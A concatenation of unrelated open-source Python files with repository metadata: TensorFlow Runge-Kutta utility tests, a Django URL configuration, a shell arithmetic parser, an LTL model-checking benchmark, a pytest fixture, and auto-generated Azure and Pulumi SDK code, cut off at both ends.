states = [(tf.eye(2), tf.ones((2, 2))) for _ in range(3)]
weighted_state_sum = rk_util.weighted_sum(weights, states)
self.assertIsInstance(weighted_state_sum, tuple)
def test_weighted_sum_nested_values(self, dtype):
del dtype # not used in this test case.
weights = [0.5, -0.25, -0.25]
states = [(tf.eye(2), tf.ones((2, 2))) for _ in range(3)]
weighted_state_sum = rk_util.weighted_sum(weights, states)
expected_result = (tf.zeros((2, 2)), tf.zeros((2, 2)))
self.assertAllClose(weighted_state_sum, expected_result)
weights = [0.5, -0.25, -0.25, 0]
states = [(tf.eye(2), tf.ones((2, 2))) for _ in range(4)]
weighted_state_sum = rk_util.weighted_sum(weights, states)
expected_result = (tf.zeros((2, 2)), tf.zeros((2, 2)))
self.assertAllClose(weighted_state_sum, expected_result)
def test_weighted_sum_value_errors(self, dtype):
del dtype # not used in this test case.
empty_weights = []
empty_states = []
with self.assertRaises(ValueError):
_ = rk_util.weighted_sum(empty_weights, empty_states)
wrong_length_weights = [0.5, -0.25, -0.25, 0]
wrong_length_states = [(tf.eye(2), tf.ones((2, 2))) for _ in range(5)]
with self.assertRaises(ValueError):
_ = rk_util.weighted_sum(wrong_length_weights, wrong_length_states)
weights = [0.5, -0.25, -0.25, 0]
not_same_structure_states = [(tf.eye(2), tf.ones((2, 2))) for _ in range(3)]
not_same_structure_states.append(tf.eye(2))
with self.assertRaises(ValueError):
_ = rk_util.weighted_sum(weights, not_same_structure_states)
def test_abs_square(self, dtype):
test_values = np.array([1 + 2j, 0.3 - 1j, 3.5 - 3.7j])
input_values = tf.cast(test_values, dtype)
actual_abs_square = rk_util.abs_square(input_values)
expected_abs_square = tf.math.square(tf.abs(input_values))
self.assertAllClose(actual_abs_square, expected_abs_square)
def test_nest_rms_norm_on_tensor(self, dtype):
test_values = np.array([1.4 -1j, 2.7 + 0.23j, 7.3 + 9.4j])
test_values = test_values.astype(dtype.as_numpy_dtype)
input_values = tf.cast(test_values, dtype=dtype)
actual_norm = rk_util.nest_rms_norm(input_values)
expected_norm = np.linalg.norm(test_values) / np.sqrt(test_values.size)
self.assertAllClose(actual_norm, expected_norm)
def test_nest_rms_norm_on_nest(self, dtype):
del dtype # not used in this test case.
a = np.array([1.4, 2.7, 7.3])
b = 0.3 * np.eye(3, dtype=np.float32) + 0.64 * np.ones((3, 3))
input_nest = (tf.convert_to_tensor(a), tf.convert_to_tensor(b))
actual_norm_nest = rk_util.nest_rms_norm(input_nest)
full_state = np.concatenate([np.expand_dims(a, 0), b])
expected_norm_nest = np.linalg.norm(full_state) / np.sqrt(full_state.size)
self.assertAllClose(expected_norm_nest, actual_norm_nest)
def test_nest_constant(self, dtype):
ndtype = dtype.as_numpy_dtype
input_structure = (
np.ones(4, dtype=ndtype),
(np.eye(3, dtype=ndtype), np.zeros(4, dtype=ndtype))
)
ones_like_structure = rk_util.nest_constant(input_structure)
tf.nest.assert_same_structure(input_structure, ones_like_structure)
flat_ones_like_structure = tf.nest.flatten(ones_like_structure)
for component in flat_ones_like_structure:
self.assertAllClose(component, tf.ones(shape=component.shape))
if __name__ == '__main__':
tf.test.main()
| 41.197452 | 80 | 0.694496 |
52d266d9f22a23c4f4623c885f9c01b4c59ad836 | 1,227 | py | Python | api/urls.py | aaxelb/SHARE | 896e4f0c0e119436c0aaea364ea19389e7099d59 | [
"Apache-2.0"
] | 1 | 2019-10-12T20:51:06.000Z | 2019-10-12T20:51:06.000Z | api/urls.py | aaxelb/SHARE | 896e4f0c0e119436c0aaea364ea19389e7099d59 | [
"Apache-2.0"
] | 21 | 2020-06-01T13:59:32.000Z | 2021-08-01T06:20:29.000Z | api/urls.py | aaxelb/SHARE | 896e4f0c0e119436c0aaea364ea19389e7099d59 | [
"Apache-2.0"
] | null | null | null | from django.conf.urls import include
from django.conf.urls import url
from api import views
from api.base.views import RootView
app_name = 'api'
urlpatterns = [
url('^$', RootView.as_view()),
url('^', include('api.banners.urls')),
url('^', include('api.formattedmetadatarecords.urls')),
url('^', include('api.ingestjobs.urls')),
url('^', include('api.normalizeddata.urls')),
url('^', include('api.rawdata.urls')),
url('^', include('api.sourceregistrations.urls')),
url('^', include('api.sourceconfigs.urls')),
url('^', include('api.sources.urls')),
url('^', include('api.suids.urls')),
url('^', include('api.users.urls')),
url('^schemas?/', include('api.schemas.urls'), name='schema'),
url('^search/', include('api.search.urls'), name='search'),
# TODO refactor non-viewset endpoints to conform to new structure
url(r'^status/?', views.ServerStatusView.as_view(), name='status'),
url(r'^rss/?', views.LegacyCreativeWorksRSS(), name='rss'),
url(r'^atom/?', views.LegacyCreativeWorksAtom(), name='atom'),
url(r'^feeds/rss/?', views.MetadataRecordsRSS(), name='feeds.rss'),
url(r'^feeds/atom/?', views.MetadataRecordsAtom(), name='feeds.atom'),
]
| 36.088235 | 74 | 0.644662 |
3153714975fcab1c9e004bd1f6229ff6f08b8ae4 | 8,508 | py | Python | asdl/typed_arith_parse.py | rhencke/oil | c40004544e47ee78cde1fcb22c672162b8eb2cd2 | [
"Apache-2.0"
] | null | null | null | asdl/typed_arith_parse.py | rhencke/oil | c40004544e47ee78cde1fcb22c672162b8eb2cd2 | [
"Apache-2.0"
] | null | null | null | asdl/typed_arith_parse.py | rhencke/oil | c40004544e47ee78cde1fcb22c672162b8eb2cd2 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python
"""
typed_arith_parse.py: Parse shell-like and C-like arithmetic.
"""
from __future__ import print_function
import sys
from _devbuild.gen.typed_arith_asdl import (
arith_expr, arith_expr_e, arith_expr_t,
arith_expr__Binary, arith_expr__FuncCall, arith_expr__Const)
from typing import Dict, List, Optional, Union, cast
from asdl import tdop
from asdl.tdop import Parser
from asdl.tdop import ParserSpec
Token = tdop.Token
#
# Null Denotation -- token that takes nothing on the left
#
def NullConstant(p, # type: Parser
token, # type: Token
bp, # type: int
):
# type: (...) -> arith_expr_t
if token.type == 'number':
return arith_expr.Const(int(token.val))
# We have to wrap a string in some kind of variant.
if token.type == 'name':
return arith_expr.Var(token.val)
raise AssertionError(token.type)
def NullParen(p, # type: Parser
token, # type: Token
bp, # type: int
):
# type: (...) -> arith_expr_t
""" Arithmetic grouping """
r = p.ParseUntil(bp)
p.Eat(')')
return r
def NullPrefixOp(p, token, bp):
# type: (Parser, Token, int) -> arith_expr_t
"""Prefix operator.
Low precedence: return, raise, etc.
return x+y is return (x+y), not (return x) + y
High precedence: logical negation, bitwise complement, etc.
!x && y is (!x) && y, not !(x && y)
"""
r = p.ParseUntil(bp)
return arith_expr.Unary(token.val, r)
def NullIncDec(p, token, bp):
# type: (Parser, Token, int) -> arith_expr_t
""" ++x or ++x[1] """
right = p.ParseUntil(bp)
if not isinstance(right, (arith_expr.Var, arith_expr.Index)):
raise tdop.ParseError("Can't assign to %r" % right)
return arith_expr.Unary(token.val, right)
#
# Left Denotation -- token that takes an expression on the left
#
def LeftIncDec(p, # type: Parser
token, # type: Token
left, # type: arith_expr_t
rbp, # type: int
):
# type: (...) -> arith_expr_t
""" For i++ and i--
"""
if not isinstance(left, (arith_expr.Var, arith_expr.Index)):
raise tdop.ParseError("Can't assign to %r" % left)
token.type = 'post' + token.type
return arith_expr.Unary(token.val, left)
def LeftIndex(p, token, left, unused_bp):
# type: (Parser, Token, arith_expr_t, int) -> arith_expr_t
""" index f[x+1] """
# f[x] or f[x][y]
if not isinstance(left, arith_expr.Var):
raise tdop.ParseError("%s can't be indexed" % left)
index = p.ParseUntil(0)
if p.AtToken(':'):
p.Next()
end = p.ParseUntil(0) # type: Union[arith_expr_t, None]
else:
end = None
p.Eat(']')
# TODO: If you see ], then
# 1:4
# 1:4:2
# Both end and step are optional
if end:
return arith_expr.Slice(left, index, end, None)
else:
return arith_expr.Index(left, index)
def LeftTernary(p, # type: Parser
token, # type: Token
left, # type: arith_expr_t
bp, # type: int
):
# type: (...) -> arith_expr_t
""" e.g. a > 1 ? x : y """
true_expr = p.ParseUntil(bp)
p.Eat(':')
false_expr = p.ParseUntil(bp)
return arith_expr.Ternary(left, true_expr, false_expr)
def LeftBinaryOp(p, # type: Parser
token, # type: Token
left, # type: arith_expr_t
rbp, # type: int
):
# type: (...) -> arith_expr__Binary
""" Normal binary operator like 1+2 or 2*3, etc. """
return arith_expr.Binary(token.val, left, p.ParseUntil(rbp))
def LeftAssign(p, # type: Parser
token, # type: Token
left, # type: arith_expr_t
rbp, # type: int
):
# type: (...) -> arith_expr__Binary
""" Normal binary operator like 1+2 or 2*3, etc. """
# x += 1, or a[i] += 1
if not isinstance(left, (arith_expr.Var, arith_expr.Index)):
raise tdop.ParseError("Can't assign to %r" % left)
node = arith_expr.Binary(token.val, left, p.ParseUntil(rbp))
# For TESTING
node.spids.append(42)
node.spids.append(43)
return node
# For overloading of , inside function calls
COMMA_PREC = 1
def LeftFuncCall(p, token, left, unused_bp):
# type: (Parser, Token, arith_expr_t, int) -> arith_expr__FuncCall
""" Function call f(a, b). """
args = []
# f(x) or f[i](x)
if not isinstance(left, arith_expr.Var):
raise tdop.ParseError("%s can't be called" % left)
func_name = left.name # get a string
while not p.AtToken(')'):
# We don't want to grab the comma, e.g. it is NOT a sequence operator. So
# set the precedence to 5.
args.append(p.ParseUntil(COMMA_PREC))
if p.AtToken(','):
p.Next()
p.Eat(")")
return arith_expr.FuncCall(func_name, args)
def MakeShellParserSpec():
# type: () -> ParserSpec
"""
Create a parser.
Compare the code below with this table of C operator precedence:
http://en.cppreference.com/w/c/language/operator_precedence
"""
spec = tdop.ParserSpec()
spec.Left(31, LeftIncDec, ['++', '--'])
spec.Left(31, LeftFuncCall, ['('])
spec.Left(31, LeftIndex, ['['])
# 29 -- binds to everything except function call, indexing, postfix ops
spec.Null(29, NullIncDec, ['++', '--'])
spec.Null(29, NullPrefixOp, ['+', '!', '~', '-'])
# Right associative: 2 ** 3 ** 2 == 2 ** (3 ** 2)
spec.LeftRightAssoc(27, LeftBinaryOp, ['**'])
spec.Left(25, LeftBinaryOp, ['*', '/', '%'])
spec.Left(23, LeftBinaryOp, ['+', '-'])
spec.Left(21, LeftBinaryOp, ['<<', '>>'])
spec.Left(19, LeftBinaryOp, ['<', '>', '<=', '>='])
spec.Left(17, LeftBinaryOp, ['!=', '=='])
spec.Left(15, LeftBinaryOp, ['&'])
spec.Left(13, LeftBinaryOp, ['^'])
spec.Left(11, LeftBinaryOp, ['|'])
spec.Left(9, LeftBinaryOp, ['&&'])
spec.Left(7, LeftBinaryOp, ['||'])
spec.LeftRightAssoc(5, LeftTernary, ['?'])
# Right associative: a = b = 2 is a = (b = 2)
spec.LeftRightAssoc(3, LeftAssign, [
'=',
'+=', '-=', '*=', '/=', '%=',
'<<=', '>>=', '&=', '^=', '|='])
spec.Left(COMMA_PREC, LeftBinaryOp, [','])
# 0 precedence -- doesn't bind until )
spec.Null(0, NullParen, ['(']) # for grouping
# -1 precedence -- never used
spec.Null(-1, NullConstant, ['name', 'number'])
spec.Null(-1, tdop.NullError, [')', ']', ':', 'eof'])
return spec
def MakeParser(s):
# type: (str) -> Parser
"""Used by tests."""
spec = MakeShellParserSpec()
lexer = tdop.Tokenize(s)
p = tdop.Parser(spec, lexer)
return p
def ParseShell(s, expected=None):
# type: (str, Optional[str]) -> arith_expr_t
"""Used by tests."""
p = MakeParser(s)
tree = p.Parse()
sexpr = repr(tree)
if expected is not None:
assert sexpr == expected, '%r != %r' % (sexpr, expected)
#print('%-40s %s' % (s, sexpr))
return tree
class Evaluator(object):
def __init__(self):
# type: () -> None
self.mem = {} # type: Dict[str, int]
def Eval(self, node):
# type: (arith_expr_t) -> int
"""Use the isinstance() style for comparison."""
if isinstance(node, arith_expr__Const):
assert node.i is not None
return node.i
if isinstance(node, arith_expr__Binary):
assert node.left is not None
assert node.right is not None
left = self.Eval(node.left)
right = self.Eval(node.right)
op = node.op
if op == '+':
return left + right
return 3
def Eval2(self, node):
# type: (arith_expr_t) -> int
tag = node.tag
if tag == arith_expr_e.Const:
n = cast(arith_expr__Const, node)
assert n.i is not None
return n.i
if tag == arith_expr_e.Binary:
n2 = cast(arith_expr__Binary, node)
assert n2.left is not None
assert n2.right is not None
left = self.Eval(n2.left)
right = self.Eval(n2.right)
op = n2.op
if op == '+':
return left + right
return 3
def main(argv):
# type: (List[str]) -> int
try:
action = argv[1]
s = argv[2]
except IndexError:
print('Usage: ./arith_parse.py ACTION EXPRESSION')
return 2
try:
node = ParseShell(s)
except tdop.ParseError as e:
print('Error parsing %r: %s' % (s, e), file=sys.stderr)
if action == 'parse':
print(node)
elif action == 'eval':
ev = Evaluator()
result = ev.Eval(node)
print(node)
print(' => ')
print(result)
else:
print('Invalid action %r' % action)
return 2
return 0
if __name__ == '__main__':
sys.exit(main(sys.argv))
| 25.097345 | 78 | 0.58968 |
571fad8055a12302bbe2ff14fef7429820d7292c | 5,690 | py | Python | benchmarks/f3_wrong_hints/scaling_ltl_infinite_state/2-extending_bound_6.py | EnricoMagnago/F3 | c863215c318d7d5f258eb9be38c6962cf6863b52 | [
"MIT"
] | 3 | 2021-04-23T23:29:26.000Z | 2022-03-23T10:00:30.000Z | benchmarks/f3_wrong_hints/scaling_ltl_infinite_state/2-extending_bound_6.py | EnricoMagnago/F3 | c863215c318d7d5f258eb9be38c6962cf6863b52 | [
"MIT"
] | null | null | null | benchmarks/f3_wrong_hints/scaling_ltl_infinite_state/2-extending_bound_6.py | EnricoMagnago/F3 | c863215c318d7d5f258eb9be38c6962cf6863b52 | [
"MIT"
] | 1 | 2021-11-17T22:02:56.000Z | 2021-11-17T22:02:56.000Z | from typing import Tuple, FrozenSet
from collections import Iterable
from mathsat import msat_term, msat_env
from mathsat import msat_make_constant, msat_declare_function
from mathsat import msat_get_integer_type, msat_get_rational_type, msat_get_bool_type
from mathsat import msat_make_and, msat_make_not, msat_make_or
from mathsat import msat_make_leq, msat_make_equal
from mathsat import msat_make_number, msat_make_plus
from pysmt.environment import Environment as PysmtEnv
import pysmt.typing as types
from ltl.ltl import TermMap, LTLEncoder
from utils import name_next, symb_to_next
from hint import Hint, Location
def msat_make_lt(menv: msat_env, arg0: msat_term, arg1: msat_term):
geq = msat_make_geq(menv, arg0, arg1)
return msat_make_not(menv, geq)
def msat_make_geq(menv: msat_env, arg0: msat_term, arg1: msat_term):
return msat_make_leq(menv, arg1, arg0)
def msat_make_gt(menv: msat_env, arg0: msat_term, arg1: msat_term):
leq = msat_make_leq(menv, arg0, arg1)
return msat_make_not(menv, leq)
def msat_make_impl(menv: msat_env, arg0: msat_term, arg1: msat_term):
n_arg0 = msat_make_not(menv, arg0)
return msat_make_or(menv, n_arg0, arg1)
def check_ltl(menv: msat_env, enc: LTLEncoder) -> Tuple[Iterable, msat_term,
msat_term, msat_term]:
assert menv
assert isinstance(menv, msat_env)
assert enc
assert isinstance(enc, LTLEncoder)
bool_type = msat_get_bool_type(menv)
real_type = msat_get_rational_type(menv)
i = msat_declare_function(menv, "i", real_type)
i = msat_make_constant(menv, i)
r = msat_declare_function(menv, "r", real_type)
r = msat_make_constant(menv, r)
l = msat_declare_function(menv, "l", real_type)
l = msat_make_constant(menv, l)
inc_i = msat_declare_function(menv, "inc_i", bool_type)
inc_i = msat_make_constant(menv, inc_i)
x_i = msat_declare_function(menv, name_next("i"), real_type)
x_i = msat_make_constant(menv, x_i)
x_r = msat_declare_function(menv, name_next("r"), real_type)
x_r = msat_make_constant(menv, x_r)
x_l = msat_declare_function(menv, name_next("l"), real_type)
x_l = msat_make_constant(menv, x_l)
x_inc_i = msat_declare_function(menv, name_next("inc_i"), bool_type)
x_inc_i = msat_make_constant(menv, x_inc_i)
curr2next = {i: x_i, r: x_r, l: x_l, inc_i: x_inc_i}
zero = msat_make_number(menv, "0")
one = msat_make_number(menv, "1")
r_gt_0 = msat_make_gt(menv, r, zero)
r_lt_l = msat_make_lt(menv, r, l)
i_geq_0 = msat_make_geq(menv, i, zero)
init = msat_make_and(menv, r_gt_0, r_lt_l)
init = msat_make_and(menv, init,
msat_make_and(menv, i_geq_0,
msat_make_not(menv, inc_i)))
init = msat_make_and(menv, init, msat_make_gt(menv, l, zero))
# r' = r
trans = msat_make_equal(menv, x_r, r)
# i < l -> ((inc_i' & i' = i + 1) | (!inc_i' & i' = i)) & l' = l
i_lt_l = msat_make_lt(menv, i, l)
x_i_eq_i_p_1 = msat_make_and(menv, x_inc_i,
msat_make_equal(menv, x_i,
msat_make_plus(menv, i, one)))
x_i_eq_i = msat_make_and(menv, msat_make_not(menv, x_inc_i),
msat_make_equal(menv, x_i, i))
x_i_eq_i_p_1_or_i = msat_make_or(menv, x_i_eq_i_p_1, x_i_eq_i)
x_l_eq_l = msat_make_equal(menv, x_l, l)
x_i_eq_i_p_1_or_i_and_x_l_eq_l = msat_make_and(menv, x_i_eq_i_p_1_or_i,
x_l_eq_l)
trans = msat_make_and(menv, trans,
msat_make_impl(menv, i_lt_l,
x_i_eq_i_p_1_or_i_and_x_l_eq_l))
# i >= l -> i' = 0 & l' = l + 1 & !inc_i'
i_geq_l = msat_make_geq(menv, i, l)
x_i_eq_0 = msat_make_equal(menv, x_i, zero)
x_l_eq_l_p_1 = msat_make_equal(menv, x_l, msat_make_plus(menv, l, one))
x_i_eq_0_and_x_l_eq_l_p_1 = msat_make_and(menv,
msat_make_and(menv, x_i_eq_0,
x_l_eq_l_p_1),
msat_make_not(menv, x_inc_i))
trans = msat_make_and(menv, trans,
msat_make_impl(menv, i_geq_l,
x_i_eq_0_and_x_l_eq_l_p_1))
# (G F inc_i) -> ! G F r > i
G_F_x_i_gt_i = enc.make_G(enc.make_F(inc_i))
r_gt_i = msat_make_gt(menv, r, i)
n_G_F_r_gt_i = msat_make_not(menv, enc.make_G(enc.make_F(r_gt_i)))
ltl = msat_make_impl(menv, G_F_x_i_gt_i, n_G_F_r_gt_i)
return TermMap(curr2next), init, trans, ltl
def hints(env: PysmtEnv) -> FrozenSet[Hint]:
assert isinstance(env, PysmtEnv)
mgr = env.formula_manager
i = mgr.Symbol("i", types.REAL)
r = mgr.Symbol("r", types.REAL)
l = mgr.Symbol("l", types.REAL)
inc_i = mgr.Symbol("inc_i", types.BOOL)
symbs = frozenset([i, r, l, inc_i])
x_i = symb_to_next(mgr, i)
x_r = symb_to_next(mgr, r)
x_l = symb_to_next(mgr, l)
x_inc_i = symb_to_next(mgr, inc_i)
res = []
n0 = mgr.Real(0)
n1 = mgr.Real(1)
stutter = mgr.Equals(x_i, i)
loc = Location(env, mgr.LE(i, n0), stutterT=stutter)
loc.set_progress(0, mgr.Equals(x_i, mgr.Minus(i, n1)))
h_i = Hint("h_i1", env, frozenset([i]), symbs)
h_i.set_locs([loc])
res.append(h_i)
loc = Location(env, mgr.LE(l, n0))
loc.set_progress(0, mgr.Equals(x_l, mgr.Minus(l, n1)))
h_l = Hint("h_l1", env, frozenset([l]), symbs)
h_l.set_locs([loc])
res.append(h_l)
return frozenset(res)
| 38.187919 | 89 | 0.634446 |
8c1e7198f65df63d140f89ce46d0128201c2ecca | 606 | py | Python | benchmarks/conftest.py | hershd23/SyMPC | af178dbc99cd1077871346113a4a05abbb510ffc | [
"MIT"
] | 64 | 2020-12-12T21:58:55.000Z | 2022-03-30T20:46:37.000Z | benchmarks/conftest.py | hershd23/SyMPC | af178dbc99cd1077871346113a4a05abbb510ffc | [
"MIT"
] | 244 | 2020-11-28T17:09:24.000Z | 2022-03-23T15:41:59.000Z | benchmarks/conftest.py | hershd23/SyMPC | af178dbc99cd1077871346113a4a05abbb510ffc | [
"MIT"
] | 55 | 2020-11-28T17:43:15.000Z | 2022-02-10T02:45:04.000Z | """Configuration file to share fixtures across benchmarks."""
# stdlib
from typing import Any
from typing import Callable
from typing import List
# third party
import pytest
import syft as sy
@pytest.fixture
def get_clients() -> Callable[[int], List[Any]]:
"""Generate a list of clients given a number.
Returns:
Callable[[int], List[Any]]: List of clients
"""
def _helper_get_clients(nr_clients: int) -> List[Any]:
return [
sy.VirtualMachine(name=f"P_{i}").get_root_client()
for i in range(nr_clients)
]
return _helper_get_clients
| 21.642857 | 62 | 0.665017 |
3c327540762b59b6540cb75db376517a2de1f63f | 8,309 | py | Python | sdk/network/azure-mgmt-network/azure/mgmt/network/v2018_11_01/operations/_load_balancer_probes_operations.py | LianwMS/azure-sdk-for-python | 612d7bca9de86ee1bd1fa59291d7bf897ba9213f | [
"MIT"
] | 2 | 2019-05-17T21:24:53.000Z | 2020-02-12T11:13:42.000Z | sdk/network/azure-mgmt-network/azure/mgmt/network/v2018_11_01/operations/_load_balancer_probes_operations.py | LianwMS/azure-sdk-for-python | 612d7bca9de86ee1bd1fa59291d7bf897ba9213f | [
"MIT"
] | 15 | 2019-07-12T18:18:04.000Z | 2019-07-25T20:55:51.000Z | sdk/network/azure-mgmt-network/azure/mgmt/network/v2018_11_01/operations/_load_balancer_probes_operations.py | LianwMS/azure-sdk-for-python | 612d7bca9de86ee1bd1fa59291d7bf897ba9213f | [
"MIT"
] | 2 | 2020-05-21T22:51:22.000Z | 2020-05-26T20:53:01.000Z | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from typing import TYPE_CHECKING
import warnings
from azure.core.exceptions import HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error
from azure.core.paging import ItemPaged
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import HttpRequest, HttpResponse
from azure.mgmt.core.exceptions import ARMErrorFormat
from .. import models
if TYPE_CHECKING:
# pylint: disable=unused-import,ungrouped-imports
from typing import Any, Callable, Dict, Generic, Iterable, Optional, TypeVar
T = TypeVar('T')
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, HttpResponse], T, Dict[str, Any]], Any]]
class LoadBalancerProbesOperations(object):
"""LoadBalancerProbesOperations operations.
You should not instantiate this class directly. Instead, you should create a Client instance that
instantiates it for you and attaches it as an attribute.
:ivar models: Alias to model classes used in this operation group.
:type models: ~azure.mgmt.network.v2018_11_01.models
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
"""
models = models
def __init__(self, client, config, serializer, deserializer):
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self._config = config
def list(
self,
resource_group_name, # type: str
load_balancer_name, # type: str
**kwargs # type: Any
):
# type: (...) -> Iterable["models.LoadBalancerProbeListResult"]
"""Gets all the load balancer probes.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param load_balancer_name: The name of the load balancer.
:type load_balancer_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either LoadBalancerProbeListResult or the result of cls(response)
:rtype: ~azure.core.paging.ItemPaged[~azure.mgmt.network.v2018_11_01.models.LoadBalancerProbeListResult]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["models.LoadBalancerProbeListResult"]
error_map = {404: ResourceNotFoundError, 409: ResourceExistsError}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2018-11-01"
def prepare_request(next_link=None):
if not next_link:
# Construct URL
url = self.list.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'loadBalancerName': self._serialize.url("load_balancer_name", load_balancer_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = 'application/json'
# Construct and send request
request = self._client.get(url, query_parameters, header_parameters)
return request
def extract_data(pipeline_response):
deserialized = self._deserialize('LoadBalancerProbeListResult', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, iter(list_of_elem)
def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
return pipeline_response
return ItemPaged(
get_next, extract_data
)
list.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/loadBalancers/{loadBalancerName}/probes'} # type: ignore
def get(
self,
resource_group_name, # type: str
load_balancer_name, # type: str
probe_name, # type: str
**kwargs # type: Any
):
# type: (...) -> "models.Probe"
"""Gets load balancer probe.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param load_balancer_name: The name of the load balancer.
:type load_balancer_name: str
:param probe_name: The name of the probe.
:type probe_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: Probe, or the result of cls(response)
:rtype: ~azure.mgmt.network.v2018_11_01.models.Probe
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["models.Probe"]
error_map = {404: ResourceNotFoundError, 409: ResourceExistsError}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2018-11-01"
# Construct URL
url = self.get.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'loadBalancerName': self._serialize.url("load_balancer_name", load_balancer_name, 'str'),
'probeName': self._serialize.url("probe_name", probe_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = 'application/json'
# Construct and send request
request = self._client.get(url, query_parameters, header_parameters)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = self._deserialize('Probe', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/loadBalancers/{loadBalancerName}/probes/{probeName}'} # type: ignore
| 46.161111 | 192 | 0.660007 |
b0554b4103173db2b2b7b8905d711bca3a72c4b8 | 8,594 | py | Python | sdk/python/pulumi_azure_nextgen/cache/database.py | pulumi/pulumi-azure-nextgen | 452736b0a1cf584c2d4c04666e017af6e9b2c15c | [
"Apache-2.0"
] | 31 | 2020-09-21T09:41:01.000Z | 2021-02-26T13:21:59.000Z | sdk/python/pulumi_azure_nextgen/cache/database.py | pulumi/pulumi-azure-nextgen | 452736b0a1cf584c2d4c04666e017af6e9b2c15c | [
"Apache-2.0"
] | 231 | 2020-09-21T09:38:45.000Z | 2021-03-01T11:16:03.000Z | sdk/python/pulumi_azure_nextgen/cache/database.py | pulumi/pulumi-azure-nextgen | 452736b0a1cf584c2d4c04666e017af6e9b2c15c | [
"Apache-2.0"
] | 4 | 2020-09-29T14:14:59.000Z | 2021-02-10T20:38:16.000Z | # coding=utf-8
# *** WARNING: this file was generated by the Pulumi SDK Generator. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union
from .. import _utilities, _tables
from . import outputs
from ._enums import *
from ._inputs import *
__all__ = ['Database']
class Database(pulumi.CustomResource):
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
client_protocol: Optional[pulumi.Input[Union[str, 'Protocol']]] = None,
cluster_name: Optional[pulumi.Input[str]] = None,
clustering_policy: Optional[pulumi.Input[Union[str, 'ClusteringPolicy']]] = None,
database_name: Optional[pulumi.Input[str]] = None,
eviction_policy: Optional[pulumi.Input[Union[str, 'EvictionPolicy']]] = None,
modules: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['ModuleArgs']]]]] = None,
persistence: Optional[pulumi.Input[pulumi.InputType['PersistenceArgs']]] = None,
port: Optional[pulumi.Input[int]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
__props__=None,
__name__=None,
__opts__=None):
"""
Describes a database on the RedisEnterprise cluster
API Version: 2021-03-01.
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[Union[str, 'Protocol']] client_protocol: Specifies whether redis clients can connect using TLS-encrypted or plaintext redis protocols. Default is TLS-encrypted.
:param pulumi.Input[str] cluster_name: The name of the RedisEnterprise cluster.
:param pulumi.Input[Union[str, 'ClusteringPolicy']] clustering_policy: Clustering policy - default is OSSCluster. Specified at create time.
:param pulumi.Input[str] database_name: The name of the database.
:param pulumi.Input[Union[str, 'EvictionPolicy']] eviction_policy: Redis eviction policy - default is VolatileLRU
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['ModuleArgs']]]] modules: Optional set of redis modules to enable in this database - modules can only be added at creation time.
:param pulumi.Input[pulumi.InputType['PersistenceArgs']] persistence: Persistence settings
:param pulumi.Input[int] port: TCP port of the database endpoint. Specified at create time. Defaults to an available port.
:param pulumi.Input[str] resource_group_name: The name of the resource group. The name is case insensitive.
"""
if __name__ is not None:
warnings.warn("explicit use of __name__ is deprecated", DeprecationWarning)
resource_name = __name__
if __opts__ is not None:
